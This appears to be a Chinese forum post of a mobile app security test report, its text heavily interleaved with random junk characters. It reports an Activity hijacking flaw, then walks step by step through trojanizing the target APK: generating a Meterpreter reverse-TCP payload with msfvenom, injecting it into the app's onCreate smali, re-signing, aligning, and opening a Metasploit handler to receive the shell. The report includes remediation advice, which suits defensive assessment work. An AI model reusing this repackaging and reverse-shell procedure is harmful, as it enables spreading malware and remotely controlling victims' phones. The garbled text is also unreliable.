3 y6 W" Q. y* P2 T7 }2 @ ) E6 \/ O! |3 g% @6 S. n 1-2 测试结果 ) y. U9 k7 J+ Q4 M }. }$ y. n" S ~5 S0 H

6 V v9 V- t. }% C6 N$ d! _ # Y4 a" c8 u K9 @! n

9 A h: g- r* G% f4 u, V* a8 k 2 |& _5 x& s/ w \7 v9 v   # B Q; A, R2 O9 R8 d0 |$ L 1 v, X) j* w- x3 D! e; w0 I

# X: K$ c5 l) f+ v, y ( {# E6 s4 j% `# R

% ~' \0 `. Y8 U' m5 n2 G' c ! L7 \( ~+ m5 @) S- Z: @% o' [+ E 2 检测结果                    7 [" H9 h9 h) x+ m: [* D 7 O D! D2 _# T

- z# ~. B% O0 a. B4 U 8 f) V3 }$ _# v% ^

7 ^8 z# E/ B1 I# B- p1 @8 C$ @. L 4 Q# \; p6 \8 \ 2.1 某某某 / t: w) D B) j& @2 c9 d0 U% d, g' m; h

( _7 C: C4 j/ j" m8 O! D - ]0 D5 B9 |5 {/ a) @0 A4 d

; O9 {: ^! M9 }' k g$ H6 ~ ; h: J5 y5 Q! _, A0 \ 2.1.1检测目标 " v- Q5 ], |& Q/ }; C+ u2 C1 p9 E# ]6 m0 h/ c) J: G+ T

* w$ r$ L1 D& X $ t6 `) h2 N/ y ?

# F% _" B4 F6 r0 n3 i% F 1 x2 X- _5 l z8 b2 W, p# h 目标地址: 某某某某某某APP }8 |' j# q7 S9 V" K/ M2 J& N+ O6 U

! N. K6 w Q$ Q9 c6 M 6 p/ {1 ~2 S4 ]$ o4 [6 w0 G

& y' c6 H8 s$ q9 |0 x; i. Z, [ ) h/ t+ U3 U: q) D$ T" c 2.1.2检测结果 ( P2 Y0 \ m: A" t5 e0 S4 S ( n; @$ e S4 a

" m5 {- O* ~5 H+ m + T# H# Y j( F, N

5 l9 w7 W/ \0 A " ^' {3 t3 F# \ 2.1.2.1 , _% Q; ]/ F- \7 T) l" x" R9 h- e4 j

0 N }1 D$ F1 ^6 ^& g- w! p 4 b+ K9 W& V+ ~/ F' W, Y

/ R% g1 J% g+ a) Q+ ] " V; v! K$ ~2 y/ r( z2 c0 U 漏洞链接地址:某某某某某某APP + B ~% S: S: c" w5 \+ m 7 R9 J0 w! N. g7 j' h

9 m0 ^# G3 c) b: s, n# `" t % ]! U, G- F& ?% C0 i) N/ f& ]- X

2 N8 u( T/ {& [0 E8 @. j ) a) @. W2 w) T: ]5 R" S* a   " y# l9 [. a. _- N$ o' d( \" R3 e1 D: p$ E/ E/ ~1 X& I

$ v; j1 ~% E2 ^) G: W7 o8 S; ^; V7 F( c5 X- h7 S

; j1 E0 J, J* T+ |) [! _ ; _/ S3 r7 n5 L; u; L 漏洞分析及取证: & |( N- C* n. r" [ ' h8 |( L5 J" o- r+ s2 Z$ F& Z1 C

. \# i5 ]0 S- `7 ]6 ~0 d+ i, z! k 7 N% G9 E1 d1 u

# ?, x" N5 A2 n% d0 t/ t3 X, i4 q3 I6 m# x( h7 `' z9 }                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 J z, w% P5 A" s& t4 m' ^$ M " F8 ^: Q7 E" ^" [& T

$ M, B1 e, C p ; _9 G8 T. K! l& G+ W7 F6 D1 _

: m# [0 K: F6 h% v# @ m ; i' W3 X: y- w* h      2 Z) Q( K5 l- r# K8 n" `. g 2 Y, P! C9 Z3 c9 I, k. B) G! t" t( e

7 B) g; J$ Y" L4 S1 Z7 W7 v 8 _2 F, G6 @* U( K& }% h3 J( L

% f& o0 k$ f/ I/ r # @7 D; X& a4 m# h$ ~                       1 k- B( q: v& ?6 I9 [ # n7 [2 s& ?& `2 W

7 W/ n) {& K! A3 M + \) ?: t& D9 l( r

, u# f. x* k% B' ^/ H g* l ! s4 R; S1 h) Y8 P , V3 \( ]9 Q1 H5 P; h [8 e8 I! t+ N ! o6 A; K& f- ~3 \9 F# _0 ]+ G

1 y( |5 b; y6 h 9 q$ {0 m, k4 S. w

! s4 s! B3 L9 d M. l) X7 }# I5 f, w! l0 B5 K 8 k/ G) F' G+ t1 p: l & n7 _' S- C) c4 E% Z1 f( H

3 o5 u( q3 l2 j h: [: K: @3 R# @- Z 0 u1 C9 C7 w: I: i# e; q. N3 ~

+ ?6 ^5 s3 ~& u: i ( X% r: y- }7 C' k0 D' w 4 U' _ s U) o! I. `( t% L' n" Z; k% s5 P4 Y z' X6 Z7 a

, k4 g9 d& N5 e/ D5 B' d 2 N2 L, U1 E- ~8 E- G' v# @( b" B$ L

# L2 w0 O1 A3 S9 L 2 q+ m9 R; V& a+ p8 E 漏洞危害:高 2 }& i* Q/ B5 {. Z2 d( E, B9 q2 Y; l( Y

2 |2 m, D# q. \# ~- Q ! |6 ~' |) D( E; ?9 O: }
: X2 C) u' U+ S7 ^# u " ]0 }! b; H) w( Y" t* o& B : ~' l, L9 d; L' k5 ~; @' \2 p: h6 o& Y7 _8 X4 T4 ]0 e- O2 A$ q. h% j, ]+ L7 m; d# W( x+ h$ F( G ?! s# v& c- E3 t6 \2 |' v9 O, Y @8 ? h6 g4 V' m9 _( x8 d" q5 ^8 N9 t" E2 m! o0 O' ]1 E1 i' f; g. F0 m6 K2 A7 G5 _1 L$ T9 }/ ?7 U, \6 T: O5 U/ l- {/ J8 Y3 H6 n& V: |0 C% t+ k, v7 _* s% l+ f9 E3 v8 _5 q; u! D0 I- A/ W3 @( i' G0 V7 S9 s/ W% l+ ~: n' l p! R6 W! ?# R; i3 H' k' h$ W6 H; V" P; O/ k4 c. F9 x1 [3 O& \9 l& G- m6 [. t7 E1 ~$ _2 x) M- `& h; t7 |+ g0 D( T( t' j0 T+ \/ m7 | U! N# e( ] J8 A9 L% V" B1 T3 ?3 Y( _1 j& o1 I0 f* W; O" `; G1 [, Q, A! ^. Q4 Y; `0 T$ k" W' K7 k. C+ F7 v
& Q/ r1 N- @/ e9 O# |: I. d1 `$ }' E' H/ `0 l

F g$ s8 s6 D* I 1 o7 c$ ?& O# |# Y5 j- t5 k 严重程度 , f& s4 U$ [! `% F1 k& j. F0 y @ 2 b# x; F) O% p: X& g# ~

$ X+ f* r1 p" N5 k2 Z ; o f: b8 \/ S: D8 z) j+ x
1 m' Y& W* n/ s& g6 y8 ^1 u * m0 R- R* I8 w; m. ^1 ?: D

# y! ^! f$ M" K m1 `5 \ ( }& W( b5 h$ | A6 i! U. L 9 i- G; M2 d9 T4 m4 C% C . `4 {9 n }( I$ {2 O& s+ b8 w

0 |, ]: m! T! Z6 \ s) O 8 x4 g) N% T( F1 X# p
: Q" T& J6 x' g; q9 ` & t1 U# x7 Q V' p6 P

# |$ E: F" _' @* k. E X( g* X& M% w$ ^4 f- U & I. |# j B3 _/ C0 d% W ) s/ Y! L' S( G/ f- f/ r

4 p- e: C' e" h* y: T * u2 P2 m% g3 B' P" m2 t# T
# R) b4 ?* c8 c# s& f: B* p : I7 w4 ?2 D3 I: d- m

5 h4 G) n8 f& f8 o I2 K ' `( Z1 P) w1 y% A [4 K; ?% m % ~" N6 ], c% M2 V6 @" c/ Y0 G3 A( e' x; m/ b

: e5 L1 F: k0 C I) y ( D" ]0 K& g2 w: t
6 U' `- l$ L# n9 y* y* F0 D. E) F$ F1 g5 F6 N3 R1 ]" B

- V4 r( `7 w& _. p8 @ - i/ y, a% N' }/ i# k   / G: p$ t+ V/ p5 G3 r # `; a0 m1 R3 G

' d- L1 h: ~5 m 4 y; E- C$ U' g4 W# m$ D' V5 n% }
. Z6 ], v# \9 Z / v! z0 H' ]1 a6 |5 h) H9 F

2 l2 a) s. K1 m& F$ B9 W! m ; e) I7 ~- h+ W. `/ ] ( ~" B$ q ~' ^ r! F- b % D' L# h9 h$ y4 h' o8 ~/ E

9 }9 ?0 h6 g/ J; V) S0 I0 ~6 h" m' M* V2 ?5 L' W2 C9 C$ Y
- d5 ~$ }$ [% P0 L 3 K0 {7 p( J8 v0 H% y

% @* R* \5 U& T& ?/ l" o) D . s8 F5 k. C5 W# [' B) ]* H   6 \, I- O6 I0 @1 l: B & q+ I% K6 n, `. c- `1 i. `

0 Q8 ~" o9 I2 x# d8 e$ s % Z& m( @( Q- `) b
) M; p7 y2 c! T% ]+ q8 { 0 x5 ^; \2 y( m+ |8 q
% q3 t, |2 _/ o 0 T4 l! M8 @5 r, `. e3 M

f7 Q1 q! e/ d $ J+ Z0 r4 W/ v) t6 @   - i! P6 @; Y. m; Y+ I & b( v8 h3 t3 _3 X

* I5 F0 g$ O0 Z7 b9 T5 m2 v6 ]9 T1 \7 @4 p" W

( t2 {& H& b& a/ c6 F5 R' v0 d1 c8 F. I " I9 i& Y# D1 {( J7 c0 N; i7 ? 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 2 J% p% ?) @- O+ q7 k* I& |/ t1 d( b

, Q* C R$ X; P) u- }3 C8 z1 V0 C5 j7 v3 x( I1 a0 k5 a

* U- `2 @6 a9 I! R3 p$ X. n5 ?2 b4 N5 F- N8 o           # X# T: i/ b( h5 q 5 H# B4 s# @: H" ^5 E

7 z( q- ^9 @8 ~3 ?; D9 ~; S 1 k8 S y# n; q# j

& j4 v9 l- [. `$ @1 b g- P. f 7 F3 n/ ?6 H( A; \   ) r3 d+ ?6 N$ r( h. N& g) D 6 F& Q) j# f2 U6 z* M U# w

/ o$ J4 G& w% R5 @ d' o8 \; D1 ?- {- v- ?, z/ h

1 E1 Z5 v* S9 O2 Q5 h, `2 w$ ^$ I7 F$ Q. {4 C7 f 2.1.2.2 5 v! u5 J/ ?* Q ) D' g' }& J# Y, J/ D4 X8 M

4 P: z2 I: A& o& N5 s( ? ; b% f# e7 i$ g4 H+ p

' R9 G5 _. @/ \ 7 Q9 G4 |8 B7 Z7 }; n7 T 漏洞链接地址:某某某某某某APP 8 F, c' I. m4 C: k / h0 v. k& u+ |1 u5 i; T' g

; k, x$ S" Q+ Y% ^( ~, k8 {: o- N' ^ , p6 O3 P# r9 S& E0 d/ B0 k

$ y8 `; T, R. P3 x9 w1 ] 9 p0 |( l: L" X$ g, A4 l* _5 J 漏洞分析及取证: ' Z% u7 R0 w8 H6 p4 V . K3 [( D. E% K% O2 t

' G1 }7 K+ l+ Y6 G * f! M b# \ `' j/ T" |

* F# {/ Y& l( H: h2 U' k4 M3 o/ X & X# D! y0 F: N! N7 y% y                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 j6 H6 h/ _9 T : W6 d( ^+ \& Z+ E

$ {+ L/ f9 Y U+ W: a- N6 h 5 q" T" C3 g' H% a0 D" _" R

; h% y: M0 G+ ~# V% X: I d . w }$ ?6 A6 T, L2 g" G h( F Metasploit 生成木马 apk " n Q! B1 w% ^3 K" E & K6 j! y# Q5 B: F* @

9 f& v, P, q0 ] 4 N5 `: p* g" ^; i

' y0 I1 w- w5 h! `( ]& L! M% R# S 0 O( l. o3 \+ R' [% }1 F msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ' F4 P% a9 }! c* ?' A5 V% t4 c) k0 v L7 _/ n# f5 w

1 i3 y+ ^! j: X! s) T% a h% k1 M0 ^ 3 ^2 B/ L8 N% J" j2 u, y

! k, Q1 A# ?+ K& Y 9 ~, i2 L/ |3 |5 P9 o1 [/ N 反编译目标apk和木马apk $ V4 \5 _$ s3 u4 a$ T2 {& |7 c6 L( J9 q' K

0 O( C, {- |) C' l2 r 0 j, N; H. I# l8 {5 v* _

8 P; G+ Y5 w, Y5 { 4 u6 d( Z$ O* L' x apktool d target.apk
8 e1 T3 s9 B7 Y3 ` 5 V& {& j* s5 F6 E8 t. R( }' I7 [ apktool d cockhorse.apk
5 h0 h3 @! w R5 \# g9 ~& ^2 q: r' C# A9 D1 k& a9 p# J0 S

; y) { `; Z" g6 L9 N, T+ f0 `- E; c 6 a8 g" \, x& I! I1 f9 r. b

# w1 B( s- h; A Z- S- L1 y8 L" E/ a3 h4 _ 木马 apk 注入目标 apk + T( f8 _! j/ \ x, ~- H- L 8 Z; e- m: i. F/ ^! Z, t$ W1 Z$ j" r

5 X; c' E7 y4 S2 t7 U$ V ! c; F4 G6 p# ^6 B7 g* L

( J! `1 Q# [2 g/ N( k + R; P& V7 m1 M) d, _2 L" N 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
8 N, o4 r5 [4 [+ O3 a5 i$ ~" G 1 s0 x" e! s) k invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
4 D1 w D- ?( F 6 |# G1 w j I1 D6 X( f% Q

( j: U& A/ j) X( j! M( s% n % n+ c! m1 @( U9 d

3 D. p- x5 @1 `& m7 {. h. h* l* ^) f9 w9 h3 I+ x j 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 7 s; b- h2 i: A- n* W/ p+ Q, U" d; N2 U9 C9 ]

6 k2 }* `$ f: ^9 a 1 N1 k3 g- }! h8 t2 H

/ f5 D {+ v" ^4 Y% } / Z" n( ~* i( d6 Z. Q' B/ v/ r3 Z 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ $ V) T% y1 a$ H- ?9 P 8 S/ _0 `/ d+ ]9 T

0 ]: F. P ?, ]- ?1 m% _+ p; B7 P4 |- f& {& d

6 d5 g6 w/ ^. g 9 r9 z5 F" @, f. q. V* @ 回编译生成最终 apk 1 n( |+ D" k5 t/ {& \3 s; ^- \5 g0 q! F

; Z* X4 H3 G$ T4 g6 @ 9 A$ g2 K! v* X$ y ?* C

3 W: n4 }" {, H6 l" o0 `1 L & l0 U" t6 s6 h/ U) `$ r 重新打包 " l1 Y1 B: a. | V0 \6 p + T g* D3 K5 d+ l6 {0 ^

o1 n, W4 G9 T/ O5 ?' B ) f* n0 q$ e# u* U& m' p' j9 ]

9 v# s5 {7 T5 e* s4 I ' f* i9 w! h2 E$ o1 \ apktool b -o repackage.apk target_app_floder 7 ?# c5 J9 t" Q4 J3 a" Q+ c, t) i, ~ ! O! a5 D6 w" }" d" I3 F, Y9 o

: ?+ g; ^! z0 F5 D* ?+ ~5 y M/ ?/ V$ e, r) \) _) v/ s4 l; X

# R: \" d2 `2 g1 p" p3 P g3 ^2 H) Z* ?3 p U* Z7 ~ 创建签名文件,有的话可忽略此步骤 9 c; C5 u% S- S0 {+ L+ k) Z $ q. X7 J2 f1 V o( k

; u7 B( G5 n4 B8 N. `- b [+ Z2 |, i% b5 H3 a

, H# y* v- U5 e" Q5 U. F$ h. C( R keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                3 n; |; k: m" ]7 N+ {) {) r0 \# h, O" x9 h# w6 J% R( N

9 M+ }: H8 t4 ^9 ` 2 r2 }4 F: N6 b" N+ x

) }8 {( i& q3 a. m0 I $ I- i9 N' i4 ?9 ? 签名,以下任选其一 . @" R7 j: h5 C9 \! L6 ] ! ~/ `# A6 |7 x1 M/ C7 ^! i

8 y, H# O6 y$ A" e: `" o- A3 r : {# F2 p8 h& @' D* i: \

! |: A6 `7 Y7 u+ `- g: R3 \2 _! K + |' Z( _& r" q4 c) Y jarsigner 方式 : j& f8 N5 q: ]3 p " K: h& n4 w& M& I# Q

% P5 r4 x0 |0 l 1 s& p6 {0 E% h( N& b* u

. R A7 x! }* c6 n* Z" G1 }( g, i$ [5 x jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 y* o+ e5 |4 }* v3 V # ?* ?! A: b+ s7 |" I( `0 v

: a7 s: C+ T; p O, v 0 u1 y1 F5 T0 i$ |

, s2 N- ]5 v* x% P3 F, E) b 2 _" G/ t/ X8 L1 [# t apksigner 方式 ' k0 T* t/ g' e2 \ m% ~3 B. L# A; D+ D" F$ R

; h4 b; g; X, W! X% k7 l- U) z8 i& X

. {( y9 o. S" y" \ R- U- V$ A& X0 L; y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk " ?* b8 v; ~& b! Z + G$ d x; H5 H( o' J

+ w8 h9 i3 r, `* a6 V& x% `: }, w- A % e# C; e0 r: ~9 X" M8 e. |

0 \" R/ s0 B$ z% ? 0 X. v% h9 w; M: t& U ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false 5 A# n5 [2 M. W* J ; \6 p3 G; Q+ f' _9 j

/ n: p: i" x% _2 J, B" {: A& w2 a& T$ `4 ]' c' ~6 A

% R0 _* D( @8 `+ S$ [ 8 Y' h+ H7 @) b5 \3 z( D 验证,以下任选其一 # ~( s' f# \; ~5 a% [* f 7 W0 e. f# p- {

$ ^! V8 `' {$ \2 B$ e0 w" f # u* @' g- C9 R

# I: J7 B& s5 L" z( [ B ' O. } u! M( l. j# l jarsigner方式 + S& B9 c) m3 e! L ) m8 j' P7 n# B2 I; Y2 l7 e

7 a4 D; o8 H" J! A- i5 |# R5 u! f" w" Y0 ^0 v. `' C

7 |$ V/ K: Q X" ~1 _ ) j* J4 N7 a. I# G, f jarsigner -verify repackaged.apk * c ?; @& A2 n! ~( \& D: g0 t* n" g! x9 `. _# N6 j

: U; ?' I5 s( p, s! B 2 z/ \3 V: K4 M$ \* J

+ e9 {) n H4 M: L; R, ?4 T $ u3 _5 m. R, c3 b6 Q apksigner 方式 ! w8 t* R1 d: o$ } : k L5 i3 k: Y; j5 Q8 m

7 O* D1 \6 {& J2 O9 x 4 \6 N+ a0 o; ^6 w0 m" y( a

) S1 z y* @- n- L 0 e/ w2 i; P, Z. k0 B+ y0 O& ` apksigner verify -v --print-certs repackaged.apk & [# F; b! p' N i# }8 D V" [( }; y6 i' h" E

1 e5 m0 R! N0 g 4 y& w ^, v ^) a1 x0 t

4 Y) j7 a" m- _# b! f' H 3 y1 z% x9 b, n. O3 v+ F" B keytool方式 # R" M- ?# h' \5 L. Y " t, i4 u2 g1 B; @& A

w: W7 `- Q* p/ c$ y , }/ H; M$ e' R0 T1 {

$ w* d8 `1 J) J; f& a / I# V9 {8 z' Y# I3 D: n keytool -printcert -jarfile repackaged.apk # L: s$ q3 x0 {8 d H( [1 w4 `( x6 |& F1 [$ t+ n

6 l2 Y# K: I/ R( C " ?6 `& e0 G; c9 ~7 _

1 u" n6 y& |/ ~6 r5 q ' h3 U, t- ?( d 对齐 , a3 f4 m) r Y/ E* t" p+ \9 b2 q! d8 F0 D3 j4 L

" M' l; N l6 ?( n' g ( q6 ^) [0 d% J

( G/ q# O9 t8 y" V% }# {1 V1 W' F ; m: o5 F" G$ p8 w0 D$ A 字节对齐优化 $ w( o% k; L# N/ P 9 z, y7 b4 e/ L7 j, i

9 j. |5 B) D, D I2 l" @5 o% u% ^. [6 W2 I+ ^1 @8 M" ]

`% W& N' v% q f . i$ E: _7 l! i zipalign -v 4 repackaged.apk final.apk % t- ?7 q, T, o0 o" t3 k( l . d1 U' a+ }) s: O ?# N: @' C7 ^7 [

4 \3 c$ `5 Y5 }: M6 i) P- g1 P' ^7 G! q- n$ z

7 O$ i. l# g# ] ' S" K4 j) B( i 检查是否对齐 % b; h! Y! K# I5 c1 V7 c 1 W5 x& e4 N4 s3 d% b

- u; u0 f, j$ y. I+ n9 q. Z' n% E) L; m3 C4 Y E

, \- H7 J% p' }$ {* N! L* S5 @/ C8 I4 ^+ G1 l" Q zipalign -c -v 4 final.apk 6 D+ P: K: ~& s2 o' }6 D - @& H5 P; ]! ~% S$ Z) c

9 C& `7 [( u8 A ?) g7 M& I/ h7 A) ~8 k6 e& U: P" ]6 ~8 L% b

7 b4 ^" g. ] p5 { k$ _8 ] 9 m2 D; ~+ c0 U" X; _$ U 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 % {+ A: l8 J$ n( y + e! R2 ~) X5 ?/ K8 ^/ {

! z" j* y% C7 B& |1 K; d8 K* H* @2 l3 T/ r2 l3 O

, t3 m' z" x, b % p9 `' {" h w5 r6 s4 M 启动Metasploit控制台,配置参数等待上线 * Z6 [" N3 G, T9 |- w o . B w) v3 k! S$ N0 }* U

) ]9 y; e a" g8 E ) K3 E O1 l; D: r5 M; v7 F

2 ]8 L6 `3 A, U4 \ , K% }( E2 C& K# K. { 在终端依次输入如下命令 % R6 I) y; X) p$ M& S" t9 [9 J ' T) t# c! C) c

% c% Z6 E2 T) S5 y$ s( `: W * p3 {, ]' H3 i, D

4 H/ b q" z8 } r) h1 ^6 s; a' r& o2 f1 H6 j. d2 ^8 J msfconsole ' n9 n! E5 Y+ Z) D; q w, e, s5 O7 _/ H7 j

& r8 V1 {. |* B / h/ N9 Q; a; w# m0 C9 @2 K

$ ^- ?& Y# n) ]+ Y4 C2 r4 t5 f* ]) Z3 N/ W; V# S; U8 [ use exploit/multi/handler 7 p5 U6 ]! E. w: l$ N 0 q, f7 P# K9 R# u, g1 o. \

" _, \/ B& X' Z; S/ C. O# h) n9 T0 t6 |: w3 R5 j6 y" C2 b" f

6 v* m% n$ x& n" v" T. ] . r! [7 L6 E8 m; t& i% f! E/ j set PAYLOAD android/meterpreter/reverse_tcp + w$ Q! k2 S6 g5 D0 \ ( G2 H X* T7 } S& ?( L9 L6 @+ m

2 E# K# Z& N' W: a, S( K/ [# ^/ |. N7 H* c

0 D: O( M; Z$ b& S: m& ~3 t; l 3 c O5 h% S9 T set LHOST 192.xxx.xx.xx / I# y; r! `( H( C, V5 p4 e 9 _% F# A) c* o4 t, F- P

5 ]6 A( d/ R% J# @$ x1 f% ~ & P& S t3 ^8 G

' V$ Y6 a+ Y% N# F$ v * @, N+ k# ?* g- j0 u3 o set LPORT 4444 9 z! q6 E+ o$ y: ]. j8 z # s$ X6 b$ d2 Z! a" [

5 q% g; Y8 R9 w" k5 W% f 6 u! [2 `' i6 R; t

, [" N8 S1 p+ M- m5 S" s0 e: l& @ + K0 ]4 O! k, @% N3 @- g exploit 7 r. V3 `8 L v' ?6 | 0 z, T0 |( I8 v: ?: v

" i: q" n; H, G6 @6 X d, X- ]# ^& G- x) ~# _4 c

5 j' I1 c6 S# j9 j/ g4 O. }; u; g: j% B/ z2 E/ B4 a0 K 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               : w) v6 s4 v+ X2 @ * ]% P2 n3 m# j

/ X! B) D: E5 S5 E 7 a4 `0 u+ F/ v5 L& ^+ a! E

$ U0 R: T L7 S0 D8 [ o ( z: o) b# q1 I- M6 k5 a 漏洞危害:中 5 X* r5 T- y% p3 D% a. Q- D, R' N0 v; L1 K7 D; U2 N* R

! w3 J- a; O) c7 _1 w9 g 9 D! I3 \' |; U! b5 }- y
F R1 i% T: Y9 J 0 _( A2 o' i- E0 s x9 C# s% W 6 H( ^6 g4 s( @# P# p- w" c- S: g- t6 C* v& T, d0 C5 ? " z2 c, u }8 H; Y7 ]. J/ k5 B4 V- b9 h7 ?" B- ~' y( Y. P2 `/ p) ^3 }" B( I2 k3 ~# W( g- @# H) r, j3 r+ {0 Y E1 b1 O/ ?- Q8 I- [' U+ I: t1 C f! v0 k& [! s0 _2 m# x# j8 @/ d m8 c) Q. S1 C: p. g3 x) _8 J+ z& r E5 S+ {, e/ ^2 G- h$ M8 q6 M' d' u3 V% @" f/ z/ s/ _7 w; P1 U* [3 ]! L6 V& ?$ q# l) T9 j% t3 R4 L& F: J# L2 v' Q- q5 h' ?0 A. K+ L. ]0 X8 U2 w# \; M+ r! O8 Q) d+ i/ S" {1 Z0 f( F. q1 U0 g3 Z; h2 k9 x: x1 s( s9 V# Z9 s, g! y) s# e8 \4 D% u- s: N: t. G" M. G; p2 s6 f- J' B: y: A) p) x5 {3 D3 x/ P2 i8 x3 l' I4 H6 }7 D, y* X; Y4 t8 S4 h- q* v( @4 Q1 U6 p& e' Q, B. e: ]5 l+ @+ z/ \: d2 R: c! V
: f& c2 t7 n+ z+ X6 r) l ) W$ V/ \' | B+ I+ R8 [1 I8 y

, `+ e% q* N% |; |4 H4 ^ & W& k) s" Z8 C+ i+ G0 w$ `5 q. A 严重程度 0 N4 M& P1 N, }/ d9 L* t* X5 }! `5 \5 Q* ~0 b2 C7 }# F- g

2 o; \/ I: X) s( a 6 n, A( v3 u; `; j5 {1 F. I
) v5 i& D8 N6 f+ l ; E3 W, R9 g' C. Z) J) L0 ~" i

5 x* I/ ?- m: q) o& | l, s6 N 1 T+ `& |+ ~3 m! g * N$ S0 L+ \3 A l; j & h }9 c/ P0 {' O/ K L6 \/ q# [

_4 n3 }, Q( D9 p1 y- R 3 {% i5 G" [, p, q$ v
8 t% @2 h+ v2 [7 M q ( J/ T# o# \9 v) `, e

k C7 K* I4 e4 L" W+ | # y, B3 ?& a$ c 5 E. j4 N8 S$ B9 F! J1 h' \ e" G' S; P/ z& z8 s2 Q8 a

& X. z; a: Y- C 6 K5 y" q9 E' c
9 K$ A( C2 I. ~ q& M) r3 h8 K& n5 F ! \. S* W9 T& k6 t4 X; X

9 b% P3 t% N3 L& C! u $ M& I% K& @3 U |4 ]. u# F3 ` 4 N! k* |1 g+ | ]. b ' E* W, _/ M- U E( ?

2 ?7 t+ _7 J8 _' }8 `: H0 e1 i1 ~+ `5 {7 |+ M ^0 T/ N7 h
; x# F9 E* Q l V8 O4 l7 x 6 z3 `5 n, o* l. ^ 9 x/ {1 V9 a! \4 X3 f. p ! q( V/ | x7 X; R

1 g# b. f/ O( [5 f6 a- `' { 8 C: l3 _! @0 x: z* k   / L# H* E/ G( P, } ( S7 L4 y) P; @8 u0 ]

) k- l, v) P4 I h8 I! a) S! k" ?0 l6 ?5 r5 ^0 |% e4 G
! @3 |) {8 G0 J' M) k9 c 2 v# T* x9 }8 g$ j5 Z% _( b

+ D0 A/ R( t. v5 ^ Y8 ]/ e- z / t- ^( z X( Z% {; I ( b8 t0 |) C0 S+ y Q8 \. m4 W/ p& X( {4 d

! v8 J* U6 t4 u _ b, x6 W0 l6 i- c5 [7 C# i( j
6 U1 j4 b0 y1 B3 N! g) K& g4 \* [ : ]2 ]/ y$ F. `0 l. Z$ z# R ! X4 c& i* ^& z' u1 u

0 m w& O3 P, H9 s2 o/ g7 R/ w2 ^ $ p$ W- U' [1 b% N2 Z1 y2 s$ o. N   0 g+ C# g4 h& e) v3 m! R0 v; T- j; H2 g2 g2 F3 N) q5 s3 G6 D

4 V9 M7 W: ^3 m/ Y5 L0 R% ] ! T6 K1 Q8 z) G) i
/ w! u1 Y4 W- n% `! G& E 1 t- }. S( _/ N: U; `) O9 g+ o2 Q
& d: P3 b5 [9 ` 0 N% m; O G) Z6 [

+ {( D5 r2 u- R; E1 W2 ]/ a * e9 M# N3 |9 T   - w1 o- y. a5 @+ m2 i A 1 K' K3 l2 I9 Q1 }" A

8 H. _, x0 R/ E- P / V% V- t% b9 Z" x5 s2 c. r5 q

: s0 ?) q/ y' P* t( e $ g0 [5 k4 f6 p* D# ?) ^, T 修复方法: # _6 W X" }6 [5 x. m3 e+ x6 E- O ; w, `% I' D4 T: G

: w/ P: E7 B9 R$ O8 H+ s4 a 5 @0 `/ q% T( J

6 f e& x8 p& V/ G 8 b. E) {* Z& _9 m& c. p               1. APP 启动时应做签名校验防止二次打包。
4 Z5 r, _/ R: G* Q , O% ^- A' e' J/ ~% P) {; Q$ \ 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - }! a/ {3 c! {- j4 x / w2 ?0 I4 H$ t4 U

$ `5 D/ t6 g1 W* p& _# ~5 P 9 i. q( a8 y1 b z2 v! T: v( F0 N 2 \+ ?. m, [/ N " y/ i; p4 q; M, f# U* @

* i: p. d& ] t( B1 S, w 7 t0 \ _: m4 _' p/ X3 K- Z   \* m; \. G1 X8 l8 Q$ j ( A4 Z# c1 S9 o3 }+ p) C

8 e4 X4 D5 m' [' u" F ; a2 N; u) a# o. | # h- x) r) l% i5 i6 a- B* f; m* ]& o3 k) u

" K5 `8 l5 J* H7 _3 S ' C) G% x3 X% a( E6 i/ o# |) H
% A% K- [3 T2 l/ J8 Z0 o / c4 b4 n0 ^( S$ }

- l4 f" @0 C9 ]: x5 l0 _ 5 O& _: t& e1 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表